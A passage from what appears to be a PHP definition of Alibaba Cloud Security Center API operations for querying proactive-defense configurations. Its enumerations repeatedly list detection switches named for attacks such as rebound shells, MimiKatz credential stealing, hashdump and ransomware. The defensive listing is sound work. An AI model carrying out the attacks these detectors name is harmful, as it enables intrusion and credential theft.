'[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"6D9CDB47-6191-4415-BE63-7E8B12CD4FBE\\",\\n \\"OverallConfig\\": {\\n \\"Type\\": \\"kdump_switch\\",\\n \\"Config\\": \\"on\\"\\n }\\n}","type":"json"}]', ], 'DescribeCommonOverallConfigList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'abilityTreeCode' => '92031', 'abilityTreeNodes' => ['FEATUREsas2XWKXT'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The source IP address of the request.'."\n", 'type' => 'string', 'required' => false, 'example' => '119.136.XX.XX', 'title' => ''], ], [ 'name' => 'TypeList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The types of the configuration items.'."\n" ."\n" .'> You can query up to 50 types at a time.'."\n", 'type' => 'array', 'items' => ['description' => 'The type of the configuration item. Valid values:'."\n" ."\n" .'* **kdump_switch**: Active defense experience optimization.'."\n" .'* **threat_detect**: Adaptive threat detection.'."\n" .'* **suspicious_aggregation**: Alert association.'."\n" .'* **alidetect**: File detection.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_38857**: Entrance service performs high-risk operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50858**: Web service performs high-risk operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50859**: Entrance service performs suspicious operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50862**: Cloud Assistant advanced protection (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50867**: Injects malicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50868**: Injects suspicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_64025**: Entrance service executes commands in an enhanced mode (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51229**: Browser service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51230**: Entrance service performs suspicious operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51232**: System processes perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51233**: Java service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51234**: Office components perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51235**: Web service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52820**: Injects malicious files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52826**: Entrance service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_55251**: Database services perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_63725**: Entrance service injects suspicious scripts or binary files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_3277**: Suspicious process startup (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50983**: Obfuscated commands (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51200**: Uses command line to download and run malicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_71131**: Entrance service executes sequence of suspicious behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51225**: Powershell executes high-risk commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51226**: Powershell executes suspicious commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52821**: Suspicious process startup (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57242**: Malicious command execution (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57340**: Uses command line to download and run malicious files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_39659**: Sensitive registry key protection (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52816**: High-risk account manipulation behavior (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54365**: Creates service auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54366**: Creates high-risk auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54367**: Creates scheduled task auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54368**: Creates registry auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54369**: Creates WMI auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50869**: Unauthorized execution of high-risk commands (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53272**: Exploits kernel vulnerabilities to elevate privileges (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54395**: Unauthorized reading and writing of sensitive files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57897**: Suspected privilege escalation (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52825**: Unauthorized execution of high-risk commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_5507**: Malicious drivers (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50876**: Uninstalls security software (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53168**: Process debugging (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54699**: Hijacks dynamic link library (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_62981**: Bypasses security monitoring (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52815**: Loads high-risk drivers (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52823**: Runs high-risk anti-rootkit (ARK) tools (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54373**: Uninstalls security software (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54374**: Intrusion trace cleanup (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54265**: Hijacks the pluggable authentication module (PAM) (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54953**: Hashdump attack (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54383**: MimiKatz credential stealing (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54384**: Hashdump attack (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50861**: Information detection (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52818**: Information detection (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54034**: Intranet scan (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51228**: High-risk lateral penetration tools (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50870**: Rebound shell (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50873**: WebShell executes commands.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51236**: Rebound shell (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50877**: Malicious program communication (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50884**: Suspicious worm script behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50885**: Malicious script behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51201**: Ransomware (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51202**: Suspected extortion (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52827**: Ransomware (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52828**: Suspected extortion (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52829**: Deletes system backup behavior (Windows).'."\n", 'type' => 'string', 'required' => false, 'example' => 'kdump_switch', 'title' => ''], 'required' => true, 'maxItems' => 50, 'title' => '', 'example' => '', ], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => 'CE500770-42D3-442E-9DDD-156E0F9F3B45', 'title' => ''], 'OverallList' => [ 'description' => 'The information about the configuration items.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The information about the configuration item.'."\n", 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The type of the configuration. Valid values:'."\n" ."\n" .'* **kdump_switch**: Active defense experience optimization.'."\n" .'* **threat_detect**: Adaptive threat detection.'."\n" .'* **suspicious_aggregation**: Alert association.'."\n" .'* **alidetect**: File detection.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_38857**: Entrance service performs high-risk operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50858**: Web service performs high-risk operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50859**: Entrance service performs suspicious operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50862**: Cloud Assistant advanced protection (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50867**: Injects malicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50868**: Injects suspicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_64025**: Entrance service executes commands in an enhanced mode (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51229**: Browser service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51230**: Entrance service performs suspicious operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51232**: System processes perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51233**: Java service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51234**: Office components perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51235**: Web service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52820**: Injects malicious files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52826**: Entrance service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_55251**: Database services perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_63725**: Entrance service injects suspicious scripts or binary files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_3277**: Suspicious process startup (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50983**: Obfuscated commands (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51200**: Uses command line to download and run malicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_71131**: Entrance service executes sequence of suspicious behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51225**: Powershell executes high-risk commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51226**: Powershell executes suspicious commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52821**: Suspicious process startup (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57242**: Malicious command execution (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57340**: Uses command line to download and run malicious files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_39659**: Sensitive registry key protection (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52816**: High-risk account manipulation behavior (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54365**: Creates service auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54366**: Creates high-risk auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54367**: Creates scheduled task auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54368**: Creates registry auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54369**: Creates WMI auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50869**: Unauthorized execution of high-risk commands (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53272**: Exploits kernel vulnerabilities to elevate privileges (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54395**: Unauthorized reading and writing of sensitive files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57897**: Suspected privilege escalation (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52825**: Unauthorized execution of high-risk commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_5507**: Malicious drivers (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50876**: Uninstalls security software (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53168**: Process debugging (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54699**: Hijacks dynamic link library (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_62981**: Bypasses security monitoring (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52815**: Loads high-risk drivers (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52823**: Runs high-risk anti-rootkit (ARK) tools (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54373**: Uninstalls security software (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54374**: Intrusion trace cleanup (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54265**: Hijacks the pluggable authentication module (PAM) (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54953**: Hashdump attack (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54383**: MimiKatz credential stealing (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54384**: Hashdump attack (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50861**: Information detection (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52818**: Information detection (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54034**: Intranet scan (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51228**: High-risk lateral penetration tools (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50870**: Rebound shell (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50873**: WebShell executes commands.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51236**: Rebound shell (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50877**: Malicious program communication (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50884**: Suspicious worm script behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50885**: Malicious script behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51201**: Ransomware (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51202**: Suspected extortion (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52827**: Ransomware (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52828**: Suspected extortion (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52829**: Deletes system backup behavior (Windows).'."\n", 'type' => 'string', 'example' => 'kdump_switch', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries that are returned.'."\n", 'type' => 'integer', 'format' => 'int32', 'example' => '184', 'title' => ''], 'Config' => ['description' => 'Indicates the status of the switch. Valid values:'."\n" ."\n" .'* **off**'."\n" .'* **on**'."\n", 'type' => 'string', 'example' => 'on', 'title' => ''], 'AuthVersionList' => [ 'description' => 'The editions of Security Center.'."\n", 'type' => 'array', 'items' => ['description' => 'The edition of Security Center. Valid values:'."\n" ."\n" .'* **sas_gte_enterprise**: the Enterprise edition or higher.'."\n" .'* **sas_gt_basic**: a paid edition.'."\n" .'* **sas_gte_advanced**: the Advanced edition or higher.'."\n", 'type' => 'string', 'example' => 'sas_gt_basic', 'title' => ''], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => 'You are not authorized to do this operation.'], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'DescribeCommonOverallConfigList', 'summary' => 'Queries the configurations of features in proactive defense.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonOverallConfigList'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCommonOverallConfigList', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"CE500770-42D3-442E-9DDD-156E0F9F3B45\\",\\n \\"OverallList\\": [\\n {\\n \\"Type\\": \\"kdump_switch\\",\\n \\"TotalCount\\": 184,\\n \\"Config\\": \\"on\\",\\n \\"AuthVersionList\\": [\\n \\"sas_gt_basic\\"\\n ]\\n }\\n ]\\n}","type":"json"}]', ], 'DescribeCommonTargetConfig' => [ 'summary' => 'Queries the configurations of the proactive defense feature.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The configuration type. Valid values:'."\n" ."\n" .'* **kdump_switch**: Active defense experience optimization.'."\n" .'* **threat_detect**: Adaptive threat detection.'."\n" .'* **containerNetwork**: Container network topology.'."\n" .'* **interceptionSwitch**: Cluster microsegmentation.'."\n" .'* **suspicious_aggregation**: Alert association.'."\n" .'* **alidetect**: File detection.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_38857**: Entrance service performs high-risk operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50858**: Web service performs high-risk operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50859**: Entrance service performs suspicious operations (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50862**: Cloud Assistant advanced protection for Linux.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50867**: Injects malicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50868**: Injects suspicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_64025**: Entrance service executes commands in an enhanced mode (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51229**: Browser service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51230**: Entrance service performs suspicious operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51232**: System processes perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51233**: Java service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51234**: Office components perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51235**: Web service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52820**: Injects malicious files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52826**: Entrance service performs high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_55251**: Database services perform high-risk operations (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_63725**: Entrance service injects suspicious scripts or binary files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_3277**: Suspicious process startup (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50983**: Obfuscated commands (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51200**: Uses command line to download and run malicious files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_71131**: Entrance service executes sequence of suspicious behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51225**: Powershell executes high-risk commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51226**: Powershell executes suspicious commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52821**: Suspicious process startup (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57242**: Malicious command execution (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57340**: Uses command line to download and run malicious files (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_39659**: Sensitive registry key protection (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52816**: High-risk account manipulation behavior (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54365**: Creates service auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54366**: Creates high-risk auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54367**: Creates scheduled task auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54368**: Creates registry auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54369**: Creates WMI auto-startup items (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50869**: Unauthorized execution of high-risk commands (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53272**: Exploits kernel vulnerabilities to elevate privileges (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54395**: Unauthorized reading and writing of sensitive files (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_57897**: Suspected privilege escalation (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52825**: Unauthorized execution of high-risk commands (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_5507**: Malicious drivers (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50876**: Uninstalls security software (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_53168**: Process debugging (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54699**: Hijacks dynamic link library (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_62981**: Bypasses security monitoring (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52815**: Loads high-risk drivers (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52823**: Runs high-risk anti-rootkit (ARK) tools (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54373**: Uninstalls security software (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54374**: Intrusion trace cleanup (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54265**: Hijacks the pluggable authentication module (PAM) (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54953**: Hashdump attack (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54383**: MimiKatz credential stealing (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54384**: Hashdump attack (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50861**: Information detection (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52818**: Information detection (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_54034**: Intranet scan (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51228**: High-risk lateral penetration tools (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50870**: Rebound shell (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50873**: WebShell executes commands.'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51236**: Rebound shell (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50877**: Malicious program communication (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50884**: Suspicious worm script behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_50885**: Malicious script behavior (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51201**: Ransomware (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_51202**: Suspected extortion (Linux).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52827**: Ransomware (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52828**: Suspected extortion (Windows).'."\n" .'* **USER-ENABLE-SWITCH-TYPE\\_52829**: Deletes system backup behavior (Windows).'."\n", 'type' => 'string', 'required' => true, 'example' => 'kdump_switch', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The data returned.'."\n", 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request, which is used to locate and troubleshoot issues.'."\n", 'type' => 'string', 'example' => '09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F', 'title' => ''], 'TargetList' => [ 'description' => 'An array that consists of the details of the configuration items.'."\n", 'type' => 'array', 'items' => [ 'description' => 'The details of the configuration item.'."\n", 'type' => 'object', 'properties' => [ 'Flag' => ['description' => 'The mode in which the configuration takes effect. Valid values:'."\n" ."\n" .'* **add**: In this mode, the configuration takes effect on the assets.'."\n" .'* **del**: In this mode, the configuration does not take effect on the assets.'."\n", 'type' => 'string', 'example' => 'add', 'title' => ''], 'Target' => ['description' => 'The ID of the asset on which the configuration takes effect.'."\n" ."\n" .'> '."\n" ."\n" .'* When you set the **TargetType** parameter to **uuid**, the value of this parameter indicates the UUID of an asset.'."\n" ."\n" .'* When you set the **TargetType** parameter to **Cluster**, the value of this parameter indicates the ID of a cluster.'."\n" ."\n" .'* When you set the **TargetType** parameter to **image_repo**, the value of this parameter indicates the ID of an image repository.'."\n", 'type' => 'string', 'example' => 'c23551de6149343e8a54e69fbefe6****', 'title' => ''], 'TargetType' => ['description' => 'The dimension from on which the feature was configured. Valid values:'."\n" ."\n" .'* **uuid**: the UUID of the asset'."\n" .'* **Cluster**: the ID of the cluster'."\n" .'* **image_repo**: the ID of the image repository'."\n", 'type' => 'string', 'example' => 'image_repo', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"09969D2C-4FAD-429E-BFBF-9A60DEF8BF6F\\",\\n \\"TargetList\\": [\\n {\\n \\"Flag\\": \\"add\\",\\n \\"Target\\": \\"c23551de6149343e8a54e69fbefe6****\\",\\n \\"TargetType\\": \\"image_repo\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'DescribeCommonTargetConfig', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'DescribeCommonTargetConfig'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:DescribeCommonTargetConfig', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'DescribeCommonTargetResultList' => [ 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasK0Q1Y8'], ], 'parameters' => [ [ 'name' => 'SourceIp', 'in' => 'query', 'schema' => ['description' => 'The IP address of the access source to query.', 'type' => 'string', 'required' => false, 'example' => '113.57.XX.XX', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['description' => 'The configuration rule type. Valid values:'."\n" ."\n" .'- **webshell_timescan**: web shell scan.'."\n" .'- **aliscriptengine**: deep detection engine.'."\n" .'- **alidetect**: installation scope of the local file detection engine.'."\n" .'- **alidetect-scan-enable**: detection scope of the local file detection engine.'."\n" ."\n" .'> You can call [ListClientUserDefineRules](~~ListClientUserDefineRules~~) and [ListSystemClientRules](~~ListSystemClientRules~~) to obtain more custom and system-configured rule types.', 'type' => 'string', 'required' => true, 'example' => 'webshell_timescan', 'title' => ''], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'description' => 'The response data.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID. Alibaba Cloud generates a unique identifier for each request. You can use the request ID to troubleshoot issues.', 'type' => 'string', 'example' => '6673D49C-A9AB-40DD-B4A2-B92306701AE7', 'title' => ''], 'TargetConfig' => [ 'description' => 'The configuration information.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The configuration type. Valid values:'."\n" ."\n" .'- **webshell_timescan**: web shell scan.'."\n" .'- **aliscriptengine**: deep detection engine.'."\n" .'- **alidetect**: installation scope of the local file detection engine.'."\n" .'- **alidetect-scan-enable**: detection scope of the local file detection engine.', 'type' => 'string', 'example' => 'webshell_timescan', 'title' => ''], 'Flag' => ['description' => 'The asset configuration flag. Valid 